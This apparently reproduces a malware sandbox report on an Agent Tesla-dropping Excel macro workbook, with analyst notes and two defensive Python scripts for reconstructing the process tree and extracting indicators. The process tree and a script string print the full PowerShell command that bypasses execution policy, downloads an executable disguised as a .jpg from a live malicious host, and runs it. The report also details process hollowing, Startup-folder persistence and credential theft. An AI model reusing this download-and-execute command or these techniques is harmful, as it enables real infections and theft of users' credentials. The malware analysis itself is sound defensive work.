Analysis
max time kernel: 137s
max time network: 137s
platform: windows10_x64
resource: win10v200430
submitted: 10-07-2020 07:13
Static task: static1
Behavioral task: behavioral1
  Sample: CO-MFE-6-2020.xlsm
  Resource: win7
Behavioral task: behavioral2
  Sample: CO-MFE-6-2020.xlsm
  Resource: win10v200430
General
Target: CO-MFE-6-2020.xlsm
Size: 173KB
MD5: 84ba27c4b3083be263a54322adec3149
SHA1: 2548d9097c1b27f064a7089afe393fde0fbfa64d
SHA256: fbe5f71e75c1b92c68a6da3698f42a2ca2f9fcc6f620f494c562583c194b2011
SHA512: 1553f2c39b55a83161326b232b507d3cf957f633462ccd6bf19b9f6890ded4d70c7c0459347f88cf45c0c846e54672a393914b6f66778748b351e397743a914e
Malware Config
Extracted: http://shopcart.indbytes.com/cig/4501307788.jpg
This is the second-stage download URL taken from the PowerShell command line. The .jpg extension is cosmetic: the response is written to %TEMP%\Name.exe and executed, so block or hunt on the host and path rather than the file type.
Signatures
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
count  description                        pid   process         target process
2      PID 1612 wrote to memory of 3864   1612  EXCEL.EXE       cmd.exe
2      PID 3864 wrote to memory of 3472   3864  cmd.exe         powershell.exe
3      PID 3472 wrote to memory of 1072   3472  powershell.exe  Name.exe
4      PID 1072 wrote to memory of 3792   1072  Name.exe        RegAsm.exe
Every link in the chain is a parent writing into a child it has just created, which this sandbox records for ordinary process creation as well, so these rows mostly mirror the process tree. The Name.exe to RegAsm.exe writes are the ones that matter: they are paired with the SetThreadContext event listed further down.
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
count  pid   process
3      3472  powershell.exe
2      3792  RegAsm.exe
Suspicious use of SetThreadContext 1 IoCs
Processes:
description                          pid   process   target process
PID 1072 set thread context of 3792  1072  Name.exe  RegAsm.exe
Taken together with the four WriteProcessMemory events from 1072 into 3792, this is the process-hollowing sequence: Name.exe starts the legitimate .NET binary RegAsm.exe, overwrites its memory, and redirects its primary thread into the injected code. Everything RegAsm.exe does afterwards (process enumeration, the Windows hook, SeDebugPrivilege) is the injected payload, not RegAsm.exe itself.
Drops startup file 1 IoCs
Processes:
description   ioc                                                                                          process
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe   Name.exe
Persistence through the per-user Startup folder: anything placed there runs at the next interactive logon of that user, with no registry change to spot.
Executes dropped EXE 1 IoCs
Processes:
pid   process
1072  Name.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers commonly read stored browser data such as saved logins and cookies.
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files of programs like FileZilla, which keep saved server credentials on disk.
Reads user/profile data of local email clients 2 TTPs
Email clients store account settings and credentials on disk, where infostealers commonly read them.
The report lists no IoC rows for these three signatures, only the technique tags.
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description                                                                                               pid   pid_target  process  target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process    3864  1612        cmd.exe  EXCEL.EXE
Here the parent is EXCEL.EXE opening a macro-enabled workbook (.xlsm), so the cmd.exe child comes from the workbook's macro rather than from an exploit. An Office process launching cmd.exe or powershell.exe is a high-confidence detection on its own.
Blacklisted process makes network request 1 IoCs
Processes:
flow  pid   process
17    3472  powershell.exe
This flow is the WebClient.DownloadFile call fetching the URL recorded under Malware Config.
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
pid   process
1072  Name.exe
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description        ioc                                                                                    process
Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                       EXCEL.EXE
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz                  EXCEL.EXE
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString   EXCEL.EXE
All three reads come from EXCEL.EXE itself; neither Name.exe nor RegAsm.exe touches these keys, so this is weak evidence of evasion by the payload.
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description        ioc                                                             process
Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS              EXCEL.EXE
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily  EXCEL.EXE
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU     EXCEL.EXE
As with the processor keys, only EXCEL.EXE reads these values, so attribute them to Office rather than to the dropped payload.
Suspicious use of SetWindowsHookEx 15 IoCs
Processes:
count  pid   process
14     1612  EXCEL.EXE
1      3792  RegAsm.exe
The fourteen EXCEL.EXE hooks are background Office activity. The one from RegAsm.exe (PID 3792, the hollowed process) is the notable row: RegAsm.exe has no reason to install a Windows hook, and a hook is how a keylogger captures input.
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
pid   process
1612  EXCEL.EXE
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
description              pid   process
Token: SeDebugPrivilege  3472  powershell.exe
Token: SeDebugPrivilege  3792  RegAsm.exe
AgentTesla
Agent Tesla is a .NET remote access tool (RAT) and information stealer, originally written in Visual Basic .NET. The browser, FTP-client and email-client data reads above are its usual credential collection, the Windows hook set from the hollowed RegAsm.exe is consistent with its keylogger, and the Startup-folder copy is its persistence.
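To make the injection chain checkable rather than eyeballed, here is an added Python example (not part of the sandbox report or its tooling) that reconstructs the process tree from the WriteProcessMemory and SetThreadContext rows above and flags the two patterns that matter here: an Office parent spawning a shell, and a parent that both writes into a child and sets that child's thread context. The event rows are constructed from this report's own tables, the regex assumes that row layout, and the Office and shell name lists are an analyst's choice rather than anything the sandbox defines.

```python
"""Reconstruct the process tree from the report's IoC rows and flag the
Office-spawns-shell and WriteProcessMemory+SetThreadContext patterns."""
import re
from collections import defaultdict

# Constructed from this report's WriteProcessMemory and SetThreadContext
# tables (one string per row); this is not the sandbox's export format.
EVENTS = [
    "PID 1612 wrote to memory of 3864 1612 EXCEL.EXE cmd.exe",
    "PID 1612 wrote to memory of 3864 1612 EXCEL.EXE cmd.exe",
    "PID 3864 wrote to memory of 3472 3864 cmd.exe powershell.exe",
    "PID 3864 wrote to memory of 3472 3864 cmd.exe powershell.exe",
    "PID 3472 wrote to memory of 1072 3472 powershell.exe Name.exe",
    "PID 3472 wrote to memory of 1072 3472 powershell.exe Name.exe",
    "PID 3472 wrote to memory of 1072 3472 powershell.exe Name.exe",
    "PID 1072 wrote to memory of 3792 1072 Name.exe RegAsm.exe",
    "PID 1072 wrote to memory of 3792 1072 Name.exe RegAsm.exe",
    "PID 1072 wrote to memory of 3792 1072 Name.exe RegAsm.exe",
    "PID 1072 wrote to memory of 3792 1072 Name.exe RegAsm.exe",
    "PID 1072 set thread context of 3792 1072 Name.exe RegAsm.exe",
]

# Row layout: "PID <src> <action> <dst> <src> <src name> <dst name>".
EVENT_RE = re.compile(
    r"PID (?P<src>\d+) (?P<action>wrote to memory of|set thread context of) "
    r"(?P<dst>\d+) (?P=src) (?P<src_name>\S+) (?P<dst_name>\S+)$"
)

# Analyst-chosen lists, not something the sandbox defines.
OFFICE = {"EXCEL.EXE", "WINWORD.EXE", "POWERPNT.EXE"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def parse_events(rows):
    """Parse the flattened rows; rows that do not match the layout are skipped."""
    events = []
    for row in rows:
        m = EVENT_RE.match(row.strip())
        if m:
            e = m.groupdict()
            e["src"], e["dst"] = int(e["src"]), int(e["dst"])
            events.append(e)
    return events


def build_tree(events):
    """Parent -> children and pid -> name maps. The sandbox records a parent's
    write into a child it has just created for ordinary process creation too,
    so the unique write pairs double as the process tree in this report."""
    children, names = defaultdict(list), {}
    for e in events:
        names[e["src"]], names[e["dst"]] = e["src_name"], e["dst_name"]
        if e["action"].startswith("wrote") and e["dst"] not in children[e["src"]]:
            children[e["src"]].append(e["dst"])
    return children, names


def render_tree(children, names, root, depth=0):
    """Indented text tree, one line per process."""
    lines = [f"{'  ' * depth}{names[root]} (PID {root})"]
    for child in children.get(root, []):
        lines.extend(render_tree(children, names, child, depth + 1))
    return lines


def find_hollowing(events):
    """A parent that both wrote into a child and set that child's thread context:
    the sequence process hollowing needs. A write on its own is not enough,
    because every link in the tree above shows one."""
    writes = {(e["src"], e["dst"]) for e in events if e["action"].startswith("wrote")}
    return [
        (e["src_name"], e["src"], e["dst_name"], e["dst"])
        for e in events
        if e["action"].startswith("set thread") and (e["src"], e["dst"]) in writes
    ]


def find_office_spawned_shells(events):
    """Office parent creating a shell or script host (the report's
    'Process spawned unexpected child process' signature), deduplicated."""
    hits, seen = [], set()
    for e in events:
        key = (e["src"], e["dst"])
        if e["src_name"] in OFFICE and e["dst_name"] in SHELLS and key not in seen:
            seen.add(key)
            hits.append((e["src_name"], e["src"], e["dst_name"], e["dst"]))
    return hits


if __name__ == "__main__":
    evs = parse_events(EVENTS)
    tree, names = build_tree(evs)
    print("\n".join(render_tree(tree, names, 1612)))
    for hit in find_office_spawned_shells(evs):
        print("office -> shell:", hit)
    for hit in find_hollowing(evs):
        print("hollowing candidate:", hit)
```

Run stand-alone it prints the five-process chain, one Office-to-shell hit (EXCEL.EXE 1612 to cmd.exe 3864) and one hollowing candidate (Name.exe 1072 into RegAsm.exe 3792). The pairing rule in find_hollowing is the point: on a real endpoint a SetThreadContext event against a process the caller did not also write into is usually a debugger or profiler, and a write alone is every CreateProcess, so neither signal is worth an alert until both land on the same parent and child.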
Processes
EXCEL.EXE (PID 1612)
  Path: C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\CO-MFE-6-2020.xlsm"
  Signatures:
  - Suspicious use of WriteProcessMemory
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious use of SetWindowsHookEx
  - Suspicious behavior: AddClipboardFormatListener

  cmd.exe (PID 3864), child of 1612
    Path: C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/4501307788.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\Name.exe')
    Signatures:
    - Suspicious use of WriteProcessMemory
    - Process spawned unexpected child process

    powershell.exe (PID 3472), child of 3864
      Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/4501307788.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\Name.exe')
      Signatures:
      - Suspicious use of WriteProcessMemory
      - Suspicious behavior: EnumeratesProcesses
      - Blacklisted process makes network request
      - Suspicious use of AdjustPrivilegeToken

      Name.exe (PID 1072), child of 3472
        Path: C:\Users\Admin\AppData\Local\Temp\Name.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\Name.exe"
        Signatures:
        - Suspicious use of WriteProcessMemory
        - Suspicious use of SetThreadContext
        - Drops startup file
        - Executes dropped EXE
        - Suspicious behavior: MapViewOfSection

        RegAsm.exe (PID 3792), child of 1072
          Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          Signatures:
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of AdjustPrivilegeToken
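As an added example (not code from the report), the following Python pulls the indicators out of the PowerShell cradle shown for PIDs 3864 and 3472: the download URL, the drop path, the path that gets executed, and the switches that suppress the execution policy and the console window. The value assumed for $env:Temp is the Admin user's Temp directory that the Name.exe path in the tree shows; the small expression resolver handles only the '+' concatenation of $env: references and single-quoted literals that this command uses, and refuses anything else rather than guessing.

```python
"""Extract blockable indicators from the macro's PowerShell download cradle."""
import re
from urllib.parse import urlparse

# The powershell.exe command line exactly as the report lists it for PID 3472.
CMDLINE = (
    "powershell.exe -executionpolicy bypass -W Hidden -command "
    "(new-object System.Net.WebClient).DownloadFile("
    "'http://shopcart.indbytes.com/cig/4501307788.jpg',$env:Temp+'\\Name.exe');"
    "(New-Object -com Shell.Application).ShellExecute($env:Temp+'\\Name.exe')"
)

# Assumed environment: the Temp directory the dropped Name.exe sits in
# according to the report's process tree.
ASSUMED_ENV = {"temp": "C:\\Users\\Admin\\AppData\\Local\\Temp"}


def resolve_expr(expr, env=ASSUMED_ENV):
    """Evaluate a '+' concatenation of $env:NAME references and single-quoted
    literals, which is all this cradle uses. Anything else raises instead of
    being guessed at."""
    parts = []
    for piece in expr.split("+"):
        piece = piece.strip()
        if piece.lower().startswith("$env:"):
            parts.append(env[piece[5:].lower()])
        elif len(piece) >= 2 and piece[0] == piece[-1] == "'":
            parts.append(piece[1:-1])
        else:
            raise ValueError(f"unsupported expression piece: {piece!r}")
    return "".join(parts)


def analyse_cradle(cmdline):
    """Return the indicators a responder would block or hunt on."""
    dl = re.search(r"DownloadFile\(\s*([^,]+?)\s*,\s*([^)]+?)\s*\)", cmdline, re.I)
    ex = re.search(r"ShellExecute\(\s*([^)]+?)\s*\)", cmdline, re.I)
    url = resolve_expr(dl.group(1)) if dl else None
    drop = resolve_expr(dl.group(2)) if dl else None
    run = resolve_expr(ex.group(1)) if ex else None
    # Compare the extension the server path advertises with the one the
    # file is written under: .jpg on the wire, .exe on disk here.
    url_ext = urlparse(url).path.rsplit(".", 1)[-1].lower() if url else ""
    drop_ext = drop.rsplit(".", 1)[-1].lower() if drop else ""
    return {
        "execution_policy_bypass": bool(re.search(r"-ex\w*\s+bypass", cmdline, re.I)),
        "hidden_window": bool(re.search(r"-w\w*\s+hidden", cmdline, re.I)),
        "url": url,
        "host": urlparse(url).hostname if url else None,
        "drop_path": drop,
        "executed_path": run,
        "extension_mismatch": bool(url) and url_ext != drop_ext,
    }


def verdict(result):
    """Reasons this command line is malicious, phrased for a ticket or alert."""
    reasons = []
    if result["execution_policy_bypass"]:
        reasons.append("execution policy bypassed on the command line")
    if result["hidden_window"]:
        reasons.append("console window hidden from the user")
    if result["url"] and result["drop_path"]:
        reasons.append(f"downloads {result['url']} to {result['drop_path']}")
    if result["extension_mismatch"]:
        reasons.append("server path ends in an image extension but the file is dropped as an executable")
    if result["executed_path"] and result["executed_path"] == result["drop_path"]:
        reasons.append("the downloaded file is executed immediately")
    return reasons


if __name__ == "__main__":
    found = analyse_cradle(CMDLINE)
    print("block:", found["host"], found["url"])
    print("hunt for:", found["drop_path"])
    for reason in verdict(found):
        print("-", reason)
```

Running it prints the host and URL to block, the drop path to hunt for on other endpoints, and five reasons for the verdict. The resolver deliberately has no fallback: a cradle that builds its path with string methods, Join-Path or a decoded byte array should fail loudly and go to an analyst, not silently produce a partial path that ends up in a blocklist.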